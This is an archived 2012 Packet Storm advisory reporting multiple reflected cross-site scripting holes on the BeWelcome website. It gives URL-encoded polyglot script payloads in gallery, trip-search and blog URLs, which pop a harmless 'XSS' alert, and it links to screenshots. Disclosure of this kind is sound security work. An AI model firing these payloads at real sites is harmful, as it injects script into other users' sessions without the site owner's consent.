BeWelcome Cross Site Scripting

2012-02-11T00:00:00
ID PACKETSTORM:109659
Type packetstorm
Reporter Sony
Modified 2012-02-11T00:00:00

Description

                                        
                                            `# Exploit Title: BeWelcome Cross Site Scripting  
# Date: 10.02.2012  
# Author: Sony  
# Software Link: http://www.bewelcome.org  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/02/bw-rox-cross-site-scripting.html  
..................................................................  
  
About BeWelcome:  
  
http://redmine.bewelcome.org/projects/bw-drupal  
http://trac.bewelcome.org/  
http://bw.guaka.org/  
  
  
Well, we have a Multiple Cross Site Scripting Vulnerabilities.  
  
Demo:  
  
in the gallery:  
  
http://www.bewelcome.org/gallery/show/user/sony/images/%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://2.bp.blogspot.com/-N1L_Rk0Agzw/TzTLoQzGqLI/AAAAAAAAAdk/hPBJnsAG_uc/s1600/galery.JPG  
  
In the group:  
  
http://4.bp.blogspot.com/-WIiIow6KlxE/TzTL2eFwB4I/AAAAAAAAAdw/rjPX_PQsAjU/s1600/group.JPG  
  
http://2.bp.blogspot.com/-Zk_7swxEeWY/TzTL8tiRtzI/AAAAAAAAAd8/im2s7JqUMtY/s1600/group2.JPG  
  
in the search "trips":  
  
http://www.bewelcome.org/trip/search?s=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&submit=Search+trips  
  
http://1.bp.blogspot.com/-upC9swXCjic/TzTMUNjSzzI/AAAAAAAAAeI/0zTzuUq53Xo/s1600/search.JPG  
  
in the blogs:  
  
http://www.bewelcome.org/blog/cat%27;alert%28String.fromCharCode%2888,83,83%29%29//%5C%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%5C%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://4.bp.blogspot.com/-tj3SZCU9Lpo/TzTMvjffzXI/AAAAAAAAAeU/TpmcYAGBi1A/s1600/blog.JPG  
  
in the "send invite":  
  
http://4.bp.blogspot.com/--o2H_bAa9pU/TzTM4X8gVdI/AAAAAAAAAeg/XieM3FxVWEA/s1600/invite.JPG  
  
I think in the profile too.  
  
Etc..  
  
..................................................................  
  
InSecurity.Ro  
  
Because we care, we're security aware!  
`